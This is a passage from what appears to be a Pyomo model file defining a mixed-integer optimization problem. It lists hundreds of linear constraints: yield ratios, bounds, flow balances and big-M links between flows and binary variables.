- 1.2*m.x139 == 0) m.c35 = Constraint(expr= m.x35 - 0.5*m.x140 == 0) m.c36 = Constraint(expr= m.x36 - 0.5*m.x141 == 0) m.c37 = Constraint(expr= m.x37 - 0.5*m.x142 == 0) m.c38 = Constraint(expr= m.x38 - 0.7*m.x143 == 0) m.c39 = Constraint(expr= m.x39 - 0.7*m.x144 == 0) m.c40 = Constraint(expr= m.x40 - 0.7*m.x145 == 0) m.c41 = Constraint(expr= m.x41 - 1.2*m.x146 == 0) m.c42 = Constraint(expr= m.x42 - 1.2*m.x147 == 0) m.c43 = Constraint(expr= m.x43 - 1.2*m.x148 == 0) m.c44 = Constraint(expr= m.x44 - 1.2*m.x149 == 0) m.c45 = Constraint(expr= m.x45 - 1.2*m.x150 == 0) m.c46 = Constraint(expr= m.x46 - 1.2*m.x151 == 0) m.c47 = Constraint(expr= m.x47 - 1.2*m.x152 == 0) m.c48 = Constraint(expr= m.x48 - 1.2*m.x153 == 0) m.c49 = Constraint(expr= m.x49 - 1.2*m.x154 == 0) m.c50 = Constraint(expr= m.x50 - 1.2*m.x155 == 0) m.c51 = Constraint(expr= m.x51 - 1.2*m.x156 == 0) m.c52 = Constraint(expr= m.x52 - 1.2*m.x157 == 0) m.c53 = Constraint(expr= m.x53 - 0.3*m.x158 == 0) m.c54 = Constraint(expr= m.x54 - 0.3*m.x159 == 0) m.c55 = Constraint(expr= m.x55 - 0.3*m.x160 == 0) m.c56 = Constraint(expr= m.x56 - 0.9*m.x161 == 0) m.c57 = Constraint(expr= m.x57 - 0.9*m.x162 == 0) m.c58 = 
Constraint(expr= m.x58 - 0.9*m.x163 == 0) m.c59 = Constraint(expr= m.x59 - 0.3*m.x164 == 0) m.c60 = Constraint(expr= m.x60 - 0.3*m.x165 == 0) m.c61 = Constraint(expr= m.x61 - 0.3*m.x166 == 0) m.c62 = Constraint(expr= m.x62 - 0.9*m.x167 == 0) m.c63 = Constraint(expr= m.x63 - 0.9*m.x168 == 0) m.c64 = Constraint(expr= m.x64 - 0.9*m.x169 == 0) m.c65 = Constraint(expr= m.x65 - 0.4*m.x170 == 0) m.c66 = Constraint(expr= m.x66 - 0.4*m.x171 == 0) m.c67 = Constraint(expr= m.x67 - 0.4*m.x172 == 0) m.c68 = Constraint(expr= m.x68 - 0.4*m.x173 == 0) m.c69 = Constraint(expr= m.x69 - 0.4*m.x174 == 0) m.c70 = Constraint(expr= m.x70 - 0.4*m.x175 == 0) m.c71 = Constraint(expr= m.x71 - 0.4*m.x176 == 0) m.c72 = Constraint(expr= m.x72 - 0.4*m.x177 == 0) m.c73 = Constraint(expr= m.x73 - 0.4*m.x178 == 0) m.c74 = Constraint(expr= m.x74 - 1.6*m.x179 == 0) m.c75 = Constraint(expr= m.x75 - 1.6*m.x180 == 0) m.c76 = Constraint(expr= m.x76 - 1.6*m.x181 == 0) m.c77 = Constraint(expr= m.x77 - 1.6*m.x182 == 0) m.c78 = Constraint(expr= m.x78 - 1.6*m.x183 == 0) m.c79 = Constraint(expr= m.x79 - 1.6*m.x184 == 0) m.c80 = Constraint(expr= m.x80 - 1.1*m.x185 == 0) m.c81 = Constraint(expr= m.x81 - 1.1*m.x186 == 0) m.c82 = Constraint(expr= m.x82 - 1.1*m.x187 == 0) m.c83 = Constraint(expr= m.x83 - 1.1*m.x188 == 0) m.c84 = Constraint(expr= m.x84 - 1.1*m.x189 == 0) m.c85 = Constraint(expr= m.x85 - 1.1*m.x190 == 0) m.c86 = Constraint(expr= m.x86 - 0.7*m.x191 == 0) m.c87 = Constraint(expr= m.x87 - 0.7*m.x192 == 0) m.c88 = Constraint(expr= m.x88 - 0.7*m.x193 == 0) m.c89 = Constraint(expr= m.x89 - 0.7*m.x194 == 0) m.c90 = Constraint(expr= m.x90 - 0.7*m.x195 == 0) m.c91 = Constraint(expr= m.x91 - 0.7*m.x196 == 0) m.c92 = Constraint(expr= m.x92 - 0.7*m.x197 == 0) m.c93 = Constraint(expr= m.x93 - 0.7*m.x198 == 0) m.c94 = Constraint(expr= m.x94 - 0.7*m.x199 == 0) m.c95 = Constraint(expr= m.x95 - 0.2*m.x200 == 0) m.c96 = Constraint(expr= m.x96 - 0.2*m.x201 == 0) m.c97 = Constraint(expr= m.x97 - 0.2*m.x202 == 0) m.c98 = 
Constraint(expr= m.x98 - 0.7*m.x203 == 0) m.c99 = Constraint(expr= m.x99 - 0.7*m.x204 == 0) m.c100 = Constraint(expr= m.x100 - 0.7*m.x205 == 0) m.c101 = Constraint(expr= m.x101 - 0.3*m.x206 == 0) m.c102 = Constraint(expr= m.x102 - 0.3*m.x207 == 0) m.c103 = Constraint(expr= m.x103 - 0.3*m.x208 == 0) m.c104 = Constraint(expr= m.x104 - 0.9*m.x209 == 0) m.c105 = Constraint(expr= m.x105 - 0.9*m.x210 == 0) m.c106 = Constraint(expr= m.x106 - 0.9*m.x211 == 0) m.c107 = Constraint(expr= m.x77 >= 1.2) m.c108 = Constraint(expr= m.x78 >= 1.15) m.c109 = Constraint(expr= m.x79 >= 1.1) m.c110 = Constraint(expr= m.x83 >= 1.2) m.c111 = Constraint(expr= m.x84 >= 1.15) m.c112 = Constraint(expr= m.x85 >= 1.1) m.c113 = Constraint(expr= m.x95 >= 1.1) m.c114 = Constraint(expr= m.x96 >= 1.1) m.c115 = Constraint(expr= m.x97 >= 1.1) m.c116 = Constraint(expr= m.x98 >= 1.1) m.c117 = Constraint(expr= m.x99 >= 1.1) m.c118 = Constraint(expr= m.x100 >= 1.1) m.c119 = Constraint(expr= m.x101 >= 1.4) m.c120 = Constraint(expr= m.x102 >= 1.3) m.c121 = Constraint(expr= m.x103 >= 1.2) m.c122 = Constraint(expr= m.x104 >= 1.3) m.c123 = Constraint(expr= m.x105 >= 1.2) m.c124 = Constraint(expr= m.x106 >= 1.1) m.c125 = Constraint(expr= m.x2 <= 55) m.c126 = Constraint(expr= m.x3 <= 40) m.c127 = Constraint(expr= m.x4 <= 40) m.c128 = Constraint(expr= m.x17 <= 46) m.c129 = Constraint(expr= m.x18 <= 41) m.c130 = Constraint(expr= m.x19 <= 50) m.c131 = Constraint(expr= m.x29 <= 45) m.c132 = Constraint(expr= m.x30 <= 62) m.c133 = Constraint(expr= m.x31 <= 42) m.c134 = Constraint(expr= m.x65 <= 54) m.c135 = Constraint(expr= m.x66 <= 51) m.c136 = Constraint(expr= m.x67 <= 50) m.c137 = Constraint(expr= m.x86 <= 40) m.c138 = Constraint(expr= m.x87 <= 45) m.c139 = Constraint(expr= m.x88 <= 41) m.c140 = Constraint(expr= m.x2 - m.x5 - m.x8 == 0) m.c141 = Constraint(expr= m.x3 - m.x6 - m.x9 == 0) m.c142 = Constraint(expr= m.x4 - m.x7 - m.x10 == 0) m.c143 = Constraint(expr= m.x11 - m.x14 == 0) m.c144 = Constraint(expr= m.x12 
- m.x15 == 0) m.c145 = Constraint(expr= m.x13 - m.x16 == 0) m.c146 = Constraint(expr= m.x17 - m.x20 + m.x35 == 0) m.c147 = Constraint(expr= m.x18 - m.x21 + m.x36 == 0) m.c148 = Constraint(expr= m.x19 - m.x22 + m.x37 == 0) m.c149 = Constraint(expr= m.x23 - m.x26 + m.x38 == 0) m.c150 = Constraint(expr= m.x24 - m.x27 + m.x39 == 0) m.c151 = Constraint(expr= m.x25 - m.x28 + m.x40 == 0) m.c152 = Constraint(expr= m.x29 - m.x32 - m.x41 == 0) m.c153 = Constraint(expr= m.x30 - m.x33 - m.x42 == 0) m.c154 = Constraint(expr= m.x31 - m.x34 - m.x43 == 0) m.c155 = Constraint(expr= m.x44 - m.x47 - m.x50 == 0) m.c156 = Constraint(expr= m.x45 - m.x48 - m.x51 == 0) m.c157 = Constraint(expr= m.x46 - m.x49 - m.x52 == 0) m.c158 = Constraint(expr= m.x53 - m.x59 == 0) m.c159 = Constraint(expr= m.x54 - m.x60 == 0) m.c160 = Constraint(expr= m.x55 - m.x61 == 0) m.c161 = Constraint(expr= m.x56 - m.x62 == 0) m.c162 = Constraint(expr= m.x57 - m.x63 == 0) m.c163 = Constraint(expr= m.x58 - m.x64 == 0) m.c164 = Constraint(expr= m.x65 - m.x68 - m.x71 == 0) m.c165 = Constraint(expr= m.x66 - m.x69 - m.x72 == 0) m.c166 = Constraint(expr= m.x67 - m.x70 - m.x73 == 0) m.c167 = Constraint(expr= m.x74 - m.x77 == 0) m.c168 = Constraint(expr= m.x75 - m.x78 == 0) m.c169 = Constraint(expr= m.x76 - m.x79 == 0) m.c170 = Constraint(expr= m.x80 - m.x83 == 0) m.c171 = Constraint(expr= m.x81 - m.x84 == 0) m.c172 = Constraint(expr= m.x82 - m.x85 == 0) m.c173 = Constraint(expr= m.x86 - m.x89 == 0) m.c174 = Constraint(expr= m.x87 - m.x90 == 0) m.c175 = Constraint(expr= m.x88 - m.x91 == 0) m.c176 = Constraint(expr= m.x5 - m.x11 - m.x212 == 0) m.c177 = Constraint(expr= m.x6 - m.x12 - m.x213 == 0) m.c178 = Constraint(expr= m.x7 - m.x13 - m.x214 == 0) m.c179 = Constraint(expr= m.x8 + m.x20 - m.x23 - m.x215 == 0) m.c180 = Constraint(expr= m.x9 + m.x21 - m.x24 - m.x216 == 0) m.c181 = Constraint(expr= m.x10 + m.x22 - m.x25 - m.x217 == 0) m.c182 = Constraint(expr= m.x32 - m.x35 - m.x38 - m.x218 == 0) m.c183 = Constraint(expr= 
m.x33 - m.x36 - m.x39 - m.x219 == 0) m.c184 = Constraint(expr= m.x34 - m.x37 - m.x40 - m.x220 == 0) m.c185 = Constraint(expr= m.x41 - m.x44 - m.x221 == 0) m.c186 = Constraint(expr= m.x42 - m.x45 - m.x222 == 0) m.c187 = Constraint(expr= m.x43 - m.x46 - m.x223 == 0) m.c188 = Constraint(expr= m.x50 - m.x53 - m.x56 - m.x224 == 0) m.c189 = Constraint(expr= m.x51 - m.x54 - m.x57 - m.x225 == 0) m.c190 = Constraint(expr= m.x52 - m.x55 - m.x58 - m.x226 == 0) m.c191 = Constraint(expr= m.x47 + m.x68 - m.x74 - m.x227 == 0) m.c192 = Constraint(expr= m.x48 + m.x69 - m.x75 - m.x228 == 0) m.c193 = Constraint(expr= m.x49 + m.x70 - m.x76 - m.x229 == 0) m.c194 = Constraint(expr= m.x71 - m.x80 + m.x92 - m.x230 == 0) m.c195 = Constraint(expr= m.x72 - m.x81 + m.x93 - m.x231 == 0) m.c196 = Constraint(expr= m.x73 - m.x82 + m.x94 - m.x232 == 0) m.c197 = Constraint(expr= m.x89 - m.x92 - m.x233 == 0) m.c198 = Constraint(expr= m.x90 - m.x93 - m.x234 == 0) m.c199 = Constraint(expr= m.x91 - m.x94 - m.x235 == 0) m.c200 = Constraint(expr= m.x113 - m.x125 <= 0) m.c201 = Constraint(expr= m.x114 - m.x126 <= 0) m.c202 = Constraint(expr= m.x115 - m.x127 <= 0) m.c203 = Constraint(expr= m.x152 - m.x173 <= 0) m.c204 = Constraint(expr= m.x153 - m.x174 <= 0) m.c205 = Constraint(expr= m.x154 - m.x175 <= 0) m.c206 = Constraint(expr= m.x176 - m.x197 <= 0) m.c207 = Constraint(expr= m.x177 - m.x198 <= 0) m.c208 = Constraint(expr= m.x178 - m.x199 <= 0) m.c209 = Constraint(expr= m.x116 - m.x416 - m.x419 - m.x422 - m.x425 == 0) m.c210 = Constraint(expr= m.x117 - m.x417 - m.x420 - m.x423 - m.x426 == 0) m.c211 = Constraint(expr= m.x118 - m.x418 - m.x421 - m.x424 - m.x427 == 0) m.c212 = Constraint(expr= m.x110 - m.x392 - m.x395 - m.x398 - m.x401 == 0) m.c213 = Constraint(expr= m.x111 - m.x393 - m.x396 - m.x399 - m.x402 == 0) m.c214 = Constraint(expr= m.x112 - m.x394 - m.x397 - m.x400 - m.x403 == 0) m.c215 = Constraint(expr= m.x128 - m.x428 - m.x431 - m.x434 - m.x437 == 0) m.c216 = Constraint(expr= m.x129 - m.x429 - 
m.x432 - m.x435 - m.x438 == 0) m.c217 = Constraint(expr= m.x130 - m.x430 - m.x433 - m.x436 - m.x439 == 0) m.c218 = Constraint(expr= m.x113 - m.x404 - m.x407 - m.x410 - m.x413 == 0) m.c219 = Constraint(expr= m.x114 - m.x405 - m.x408 - m.x411 - m.x414 == 0) m.c220 = Constraint(expr= m.x115 - m.x406 - m.x409 - m.x412 - m.x415 == 0) m.c221 = Constraint(expr= m.x140 - m.x452 - m.x455 - m.x458 - m.x461 == 0) m.c222 = Constraint(expr= m.x141 - m.x453 - m.x456 - m.x459 - m.x462 == 0) m.c223 = Constraint(expr= m.x142 - m.x454 - m.x457 - m.x460 - m.x463 == 0) m.c224 = Constraint(expr= m.x143 - m.x464 - m.x467 - m.x470 - m.x473 == 0) m.c225 = Constraint(expr= m.x144 - m.x465 - m.x468 - m.x471 - m.x474 == 0) m.c226 = Constraint(expr= m.x145 - m.x466 - m.x469 - m.x472 - m.x475 == 0) m.c227 = Constraint(expr= m.x137 - m.x440 - m.x443 - m.x446 - m.x449 == 0) m.c228 = Constraint(expr= m.x138 - m.x441 - m.x444 - m.x447 - m.x450 == 0) m.c229 = Constraint(expr= m.x139 - m.x442 - m.x445 - m.x448 - m.x451 == 0) m.c230 = Constraint(expr= m.x149 - m.x488 - m.x491 - m.x494 - m.x497 == 0) m.c231 = Constraint(expr= m.x150 - m.x489 - m.x492 - m.x495 - m.x498 == 0) m.c232 = Constraint(expr= m.x151 - m.x490 - m.x493 - m.x496 - m.x499 == 0) m.c233 = Constraint(expr= m.x146 - m.x476 - m.x479 - m.x482 - m.x485 == 0) m.c234 = Constraint(expr= m.x147 - m.x477 - m.x480 - m.x483 - m.x486 == 0) m.c235 = Constraint(expr= m.x148 - m.x478 - m.x481 - m.x484 - m.x487 == 0) m.c236 = Constraint(expr= m.x158 - m.x524 - m.x527 - m.x530 - m.x533 == 0) m.c237 = Constraint(expr= m.x159 - m.x525 - m.x528 - m.x531 - m.x534 == 0) m.c238 = Constraint(expr= m.x160 - m.x526 - m.x529 - m.x532 - m.x535 == 0) m.c239 = Constraint(expr= m.x161 - m.x536 - m.x539 - m.x542 - m.x545 == 0) m.c240 = Constraint(expr= m.x162 - m.x537 - m.x540 - m.x543 - m.x546 == 0) m.c241 = Constraint(expr= m.x163 - m.x538 - m.x541 - m.x544 - m.x547 == 0) m.c242 = Constraint(expr= m.x155 - m.x512 - m.x515 - m.x518 - m.x521 == 0) m.c243 = 
Constraint(expr= m.x156 - m.x513 - m.x516 - m.x519 - m.x522 == 0) m.c244 = Constraint(expr= m.x157 - m.x514 - m.x517 - m.x520 - m.x523 == 0) m.c245 = Constraint(expr= m.x179 - m.x560 - m.x563 - m.x566 - m.x569 == 0) m.c246 = Constraint(expr= m.x180 - m.x561 - m.x564 - m.x567 - m.x570 == 0) m.c247 = Constraint(expr= m.x181 - m.x562 - m.x565 - m.x568 - m.x571 == 0) m.c248 = Constraint(expr= m.x152 - m.x500 - m.x503 - m.x506 - m.x509 == 0) m.c249 = Constraint(expr= m.x153 - m.x501 - m.x504 - m.x507 - m.x510 == 0) m.c250 = Constraint(expr= m.x154 - m.x502 - m.x505 - m.x508 - m.x511 == 0) m.c251 = Constraint(expr= m.x185 - m.x572 - m.x575 - m.x578 - m.x581 == 0) m.c252 = Constraint(expr= m.x186 - m.x573 - m.x576 - m.x579 - m.x582 == 0) m.c253 = Constraint(expr= m.x187 - m.x574 - m.x577 - m.x580 - m.x583 == 0) m.c254 = Constraint(expr= m.x176 - m.x548 - m.x551 - m.x554 - m.x557 == 0) m.c255 = Constraint(expr= m.x177 - m.x549 - m.x552 - m.x555 - m.x558 == 0) m.c256 = Constraint(expr= m.x178 - m.x550 - m.x553 - m.x556 - m.x559 == 0) m.c257 = Constraint(expr= m.x197 - m.x596 - m.x599 - m.x602 - m.x605 == 0) m.c258 = Constraint(expr= m.x198 - m.x597 - m.x600 - m.x603 - m.x606 == 0) m.c259 = Constraint(expr= m.x199 - m.x598 - m.x601 - m.x604 - m.x607 == 0) m.c260 = Constraint(expr= m.x194 - m.x584 - m.x587 - m.x590 - m.x593 == 0) m.c261 = Constraint(expr= m.x195 - m.x585 - m.x588 - m.x591 - m.x594 == 0) m.c262 = Constraint(expr= m.x196 - m.x586 - m.x589 - m.x592 - m.x595 == 0) m.c263 = Constraint(expr= m.x416 - 233.75*m.b704 <= 0) m.c264 = Constraint(expr= m.x417 - 170*m.b705 <= 0) m.c265 = Constraint(expr= m.x418 - 170*m.b706 <= 0) m.c266 = Constraint(expr= m.x419 - 233.75*m.b707 <= 0) m.c267 = Constraint(expr= m.x420 - 170*m.b708 <= 0) m.c268 = Constraint(expr= m.x421 - 170*m.b709 <= 0) m.c269 = Constraint(expr= m.x422 - 233.75*m.b710 <= 0) m.c270 = Constraint(expr= m.x423 - 170*m.b711 <= 0) m.c271 = Constraint(expr= m.x424 - 170*m.b712 <= 0) m.c272 = Constraint(expr= 
m.x425 - 233.75*m.b713 <= 0) m.c273 = Constraint(expr= m.x426 - 170*m.b714 <= 0) m.c274 = Constraint(expr= m.x427 - 170*m.b715 <= 0) m.c275 = Constraint(expr= m.x428 - 383.5625*m.b716 <= 0) m.c276 = Constraint(expr= m.x429 - 316.001666666667*m.b717 <= 0) m.c277 = Constraint(expr= m.x430 - 317.585*m.b718 <= 0) m.c278 = Constraint(expr= m.x431 - 383.5625*m.b719 <= 0) m.c279 = Constraint(expr= m.x432 - 316.001666666667*m.b720 <= 0) m.c280 = Constraint(expr= m.x433 - 317.585*m.b721 <= 0) m.c281 = Constraint(expr= m.x434 - 383.5625*m.b722 <= 0) m.c282 = Constraint(expr= m.x435 - 316.001666666667*m.b723 <= 0) m.c283 = Constraint(expr= m.x436 - 317.585*m.b724 <= 0) m.c284 = Constraint(expr= m.x437 - 383.5625*m.b725 <= 0) m.c285 = Constraint(expr= m.x438 - 316.001666666667*m.b726 <= 0) m.c286 = Constraint(expr= m.x439 - 317.585*m.b727 <= 0) m.c287 = Constraint(expr= m.x452 - 36.75*m.b728 <= 0) m.c288 = Constraint(expr= m.x453 - 50.6333333333333*m.b729 <= 0) m.c289 = Constraint(expr= m.x454 - 34.3*m.b730 <= 0) m.c290 = Constraint(expr= m.x455 - 36.75*m.b731 <= 0) m.c291 = Constraint(expr= m.x456 - 50.6333333333333*m.b732 <= 0) m.c292 = Constraint(expr= m.x457 - 34.3*m.b733 <= 0) m.c293 = Constraint(expr= m.x458 - 36.75*m.b734 <= 0) m.c294 = Constraint(expr= m.x459 - 50.6333333333333*m.b735 <= 0) m.c295 = Constraint(expr= m.x460 - 34.3*m.b736 <= 0) m.c296 = Constraint(expr= m.x461 - 36.75*m.b737 <= 0) m.c297 = Constraint(expr= m.x462 - 50.6333333333333*m.b738 <= 0) m.c298 = Constraint(expr= m.x463 - 34.3*m.b739 <= 0) m.c299 = Constraint(expr= m.x464 - 36.75*m.b728 <= 0) m.c300 = Constraint(expr= m.x465 - 50.6333333333333*m.b729 <= 0) m.c301 = Constraint(expr= m.x466 - 34.3*m.b730 <= 0) m.c302 = Constraint(expr= m.x467 - 36.75*m.b731 <= 0) m.c303 = Constraint(expr= m.x468 - 50.6333333333333*m.b732 <= 0) m.c304 = Constraint(expr= m.x469 - 34.3*m.b733 <= 0) m.c305 = Constraint(expr= m.x470 - 36.75*m.b734 <= 0) m.c306 = Constraint(expr= m.x471 - 50.6333333333333*m.b735 <= 0) 
m.c307 = Constraint(expr= m.x472 - 34.3*m.b736 <= 0) m.c308 = Constraint(expr= m.x473 - 36.75*m.b737 <= 0) m.c309 = Constraint(expr= m.x474 - 50.6333333333333*m.b738 <= 0) m.c310 = Constraint(expr= m.x475 - 34.3*m.b739 <= 0) m.c311 = Constraint(expr= m.x488 - 33.75*m.b740 <= 0) m.c312 = Constraint(expr= m.x489 - 46.5*m.b741 <= 0) m.c313 = Constraint(expr= m.x490 - 31.5*m.b742 <= 0) m.c314 = Constraint(expr= m.x491 - 33.75*m.b743 <= 0) m.c315 = Constraint(expr= m.x492 - 46.5*m.b744 <= 0) m.c316 = Constraint(expr= m.x493 - 31.5*m.b745 <= 0) m.c317 = Constraint(expr= m.x494 - 33.75*m.b746 <= 0) m.c318 = Constraint(expr= m.x495 - 46.5*m.b747 <= 0) m.c319 = Constraint(expr= m.x496 - 31.5*m.b748 <= 0) m.c320 = Constraint(expr= m.x497 - 33.75*m.b749 <= 0) m.c321 = Constraint(expr= m.x498 - 46.5*m.b750 <= 0) m.c322 = Constraint(expr= m.x499 - 31.5*m.b751 <= 0) m.c323 = Constraint(expr= m.x524 - 32.0625*m.b752 <= 0) m.c324 = Constraint(expr= m.x525 - 44.175*m.b753 <= 0) m.c325 = Constraint(expr= m.x526 - 29.925*m.b754 <= 0) m.c326 = Constraint(expr= m.x527 - 32.0625*m.b755 <= 0) m.c327 = Constraint(expr= m.x528 - 44.175*m.b756 <= 0) m.c328 = Constraint(expr= m.x529 - 29.925*m.b757 <= 0) m.c329 = Constraint(expr= m.x530 - 32.0625*m.b758 <= 0) m.c330 = Constraint(expr= m.x531 - 44.175*m.b759 <= 0) m.c331 = Constraint(expr= m.x532 - 29.925*m.b760 <= 0) m.c332 = Constraint(expr= m.x533 - 32.0625*m.b761 <= 0) m.c333 = Constraint(expr= m.x534 - 44.175*m.b762 <= 0) m.c334 = Constraint(expr= m.x535 - 29.925*m.b763 <= 0) m.c335 = Constraint(expr= m.x536 - 32.0625*m.b752 <= 0) m.c336 = Constraint(expr= m.x537 - 44.175*m.b753 <= 0) m.c337 = Constraint(expr= m.x538 - 29.925*m.b754 <= 0) m.c338 = Constraint(expr= m.x539 - 32.0625*m.b755 <= 0) m.c339 = Constraint(expr= m.x540 - 44.175*m.b756 <= 0) m.c340 = Constraint(expr= m.x541 - 29.925*m.b757 <= 0) m.c341 = Constraint(expr= m.x542 - 32.0625*m.b758 <= 0) m.c342 = Constraint(expr= m.x543 - 44.175*m.b759 <= 0) m.c343 = Constraint(expr= 
m.x544 - 29.925*m.b760 <= 0) m.c344 = Constraint(expr= m.x545 - 32.0625*m.b761 <= 0) m.c345 = Constraint(expr= m.x546 - 44.175*m.b762 <= 0) m.c346 = Constraint(expr= m.x547 - 29.925*m.b763 <= 0) m.c347 = Constraint(expr= m.x560 - 143.4375*m.b764 <= 0) m.c348 = Constraint(expr= m.x561 - 147.9*m.b765 <= 0) m.c349 = Constraint(expr= m.x562 - 133.025*m.b766 <= 0) m.c350 = Constraint(expr= m.x563 - 143.4375*m.b767 <= 0) m.c351 = Constraint(expr= m.x564 - 147.9*m.b768 <= 0) m.c352 = Constraint(expr= m.x565 - 133.025*m.b769 <= 0) m.c353 = Constraint(expr= m.x566 - 143.4375*m.b770 <= 0) m.c354 = Constraint(expr= m.x567 - 147.9*m.b771 <= 0) m.c355 = Constraint(expr= m.x568 - 133.025*m.b772 <= 0) m.c356 = Constraint(expr= m.x569 - 143.4375*m.b773 <= 0) m.c357 = Constraint(expr= m.x570 - 147.9*m.b774 <= 0) m.c358 = Constraint(expr= m.x571 - 133.025*m.b775 <= 0) m.c359 = Constraint(expr= m.x572 - 178.192857142857*m.b776 <= 0) m.c360 = Constraint(expr= m.x573 - 177.310714285714*m.b777 <= 0) m.c361 = Constraint(expr= m.x574 - 169.941428571429*m.b778 <= 0) m.c362 = Constraint(expr= m.x575 - 178.192857142857*m.b779 <= 0) m.c363 = Constraint(expr= m.x576 - 177.310714285714*m.b780 <= 0) m.c364 = Constraint(expr= m.x577 - 169.941428571429*m.b781 <= 0) m.c365 = Constraint(expr= m.x578 - 178.192857142857*m.b782 <= 0) m.c366 = Constraint(expr= m.x579 - 177.310714285714*m.b783 <= 0) m.c367 = Constraint(expr= m.x580 - 169.941428571429*m.b784 <= 0) m.c368 = Constraint(expr= m.x581 - 178.192857142857*m.b785 <= 0) m.c369 = Constraint(expr= m.x582 - 177.310714285714*m.b786 <= 0) m.c370 = Constraint(expr= m.x583 - 169.941428571429*m.b787 <= 0) m.c371 = Constraint(expr= m.x596 - 52.5714285714286*m.b788 <= 0) m.c372 = Constraint(expr= m.x597 - 59.1428571428572*m.b789 <= 0) m.c373 = Constraint(expr= m.x598 - 53.8857142857143*m.b790 <= 0) m.c374 = Constraint(expr= m.x599 - 52.5714285714286*m.b791 <= 0) m.c375 = Constraint(expr= m.x600 - 59.1428571428572*m.b792 <= 0) m.c376 = Constraint(expr= 
m.x601 - 53.8857142857143*m.b793 <= 0) m.c377 = Constraint(expr= m.x602 - 52.5714285714286*m.b794 <= 0) m.c378 = Constraint(expr= m.x603 - 59.1428571428572*m.b795 <= 0) m.c379 = Constraint(expr= m.x604 - 53.8857142857143*m.b796 <= 0) m.c380 = Constraint(expr= m.x605 - 52.5714285714286*m.b797 <= 0) m.c381 = Constraint(expr= m.x606 - 59.1428571428572*m.b798 <= 0) m.c382 = Constraint(expr= m.x607 - 53.8857142857143*m.b799 <= 0) m.c383 = Constraint(expr= m.x392 - 275*m.b704 <= 0) m.c384 = Constraint(expr= m.x393 - 200*m.b705 <= 0) m.c385 = Constraint(expr= m.x394 - 200*m.b706 <= 0) m.c386 = Constraint(expr= m.x395 - 275*m.b707 <= 0) m.c387 = Constraint(expr= m.x396 - 200*m.b708 <= 0) m.c388 = Constraint(expr= m.x397 - 200*m.b709 <= 0) m.c389 = Constraint(expr= m.x398 - 275*m.b710 <= 0) m.c390 = Constraint(expr= m.x399 - 200*m.b711 <= 0) m.c391 = Constraint(expr= m.x400 - 200*m.b712 <= 0) m.c392 = Constraint(expr= m.x401 - 275*m.b713 <= 0) m.c393 = Constraint(expr= m.x402 - 200*m.b714 <= 0) m.c394 = Constraint(expr= m.x403 - 200*m.b715 <= 0) m.c395 = Constraint(expr= m.x404 - 275*m.b716 <= 0) m.c396 = Constraint(expr= m.x405 - 200*m.b717 <= 0) m.c397 = Constraint(expr= m.x406 - 200*m.b718 <= 0) m.c398 = Constraint(expr= m.x407 - 275*m.b719 <= 0) m.c399 = Constraint(expr= m.x408 - 200*m.b720 <= 0) m.c400 = Constraint(expr= m.x409 - 200*m.b721 <= 0) m.c401 = Constraint(expr= m.x410 - 275*m.b722 <= 0) m.c402 = Constraint(expr= m.x411 - 200*m.b723 <= 0) m.c403 = Constraint(expr= m.x412 - 200*m.b724 <= 0) m.c404 = Constraint(expr= m.x413 - 275*m.b725 <= 0) m.c405 = Constraint(expr= m.x414 - 200*m.b726 <= 0) m.c406 = Constraint(expr= m.x415 - 200*m.b727 <= 0) m.c407 = Constraint(expr= m.x440 - 37.5*m.b728 <= 0) m.c408 = Constraint(expr= m.x441 - 51.6666666666667*m.b729 <= 0) m.c409 = Constraint(expr= m.x442 - 35*m.b730 <= 0) m.c410 = Constraint(expr= m.x443 - 37.5*m.b731 <= 0) m.c411 = Constraint(expr= m.x444 - 51.6666666666667*m.b732 <= 0) m.c412 = Constraint(expr= m.x445 - 
35*m.b733 <= 0) m.c413 = Constraint(expr= m.x446 - 37.5*m.b734 <= 0) m.c414 = Constraint(expr= m.x447 - 51.6666666666667*m.b735 <= 0) m.c415 = Constraint(expr= m.x448 - 35*m.b736 <= 0) m.c416 = Constraint(expr= m.x449 - 37.5*m.b737 <= 0) m.c417 = Constraint(expr= m.x450 - 51.6666666666667*m.b738 <= 0) m.c418 = Constraint(expr= m.x451 - 35*m.b739 <= 0) m.c419 = Constraint(expr= m.x476 - 37.5*m.b740 <= 0) m.c420 = Constraint(expr= m.x477 - 51.6666666666667*m.b741 <= 0) m.c421 = Constraint(expr= m.x478 - 35*m.b742 <= 0) m.c422 = Constraint(expr= m.x479 - 37.5*m.b743 <= 0) m.c423 = Constraint(expr= m.x480 - 51.6666666666667*m.b744 <= 0) m.c424 = Constraint(expr= m.x481 - 35*m.b745 <= 0) m.c425 = Constraint(expr= m.x482 - 37.5*m.b746 <= 0) m.c426 = Constraint(expr= m.x483 - 51.6666666666667*m.b747 <= 0) m.c427 = Constraint(expr= m.x484 - 35*m.b748 <= 0) m.c428 = Constraint(expr= m.x485 - 37.5*m.b749 <= 0) m.c429 = Constraint(expr= m.x486 - 51.6666666666667*m.b750 <= 0) m.c430 = Constraint(expr= m.x487 - 35*m.b751 <= 0) m.c431 = Constraint(expr= m.x512 - 33.75*m.b752 <= 0) m.c432 = Constraint(expr= m.x513 - 46.5*m.b753 <= 0) m.c433 = Constraint(expr= m.x514 - 31.5*m.b754 <= 0) m.c434 = Constraint(expr= m.x515 - 33.75*m.b755 <= 0) m.c435 = Constraint(expr= m.x516 - 46.5*m.b756 <= 0) m.c436 = Constraint(expr= m.x517 - 31.5*m.b757 <= 0) m.c437 = Constraint(expr= m.x518 - 33.75*m.b758 <= 0) m.c438 = Constraint(expr= m.x519 - 46.5*m.b759 <= 0) m.c439 = Constraint(expr= m.x520 - 31.5*m.b760 <= 0) m.c440 = Constraint(expr= m.x521 - 33.75*m.b761 <= 0) m.c441 = Constraint(expr= m.x522 - 46.5*m.b762 <= 0) m.c442 = Constraint(expr= m.x523 - 31.5*m.b763 <= 0) m.c443 = Constraint(expr= m.x500 - 33.75*m.b764 <= 0) m.c444 = Constraint(expr= m.x501 - 46.5*m.b765 <= 0) m.c445 = Constraint(expr= m.x502 - 31.5*m.b766 <= 0) m.c446 = Constraint(expr= m.x503 - 33.75*m.b767 <= 0) m.c447 = Constraint(expr= m.x504 - 46.5*m.b768 <= 0) m.c448 = Constraint(expr= m.x505 - 31.5*m.b769 <= 0) m.c449 = 
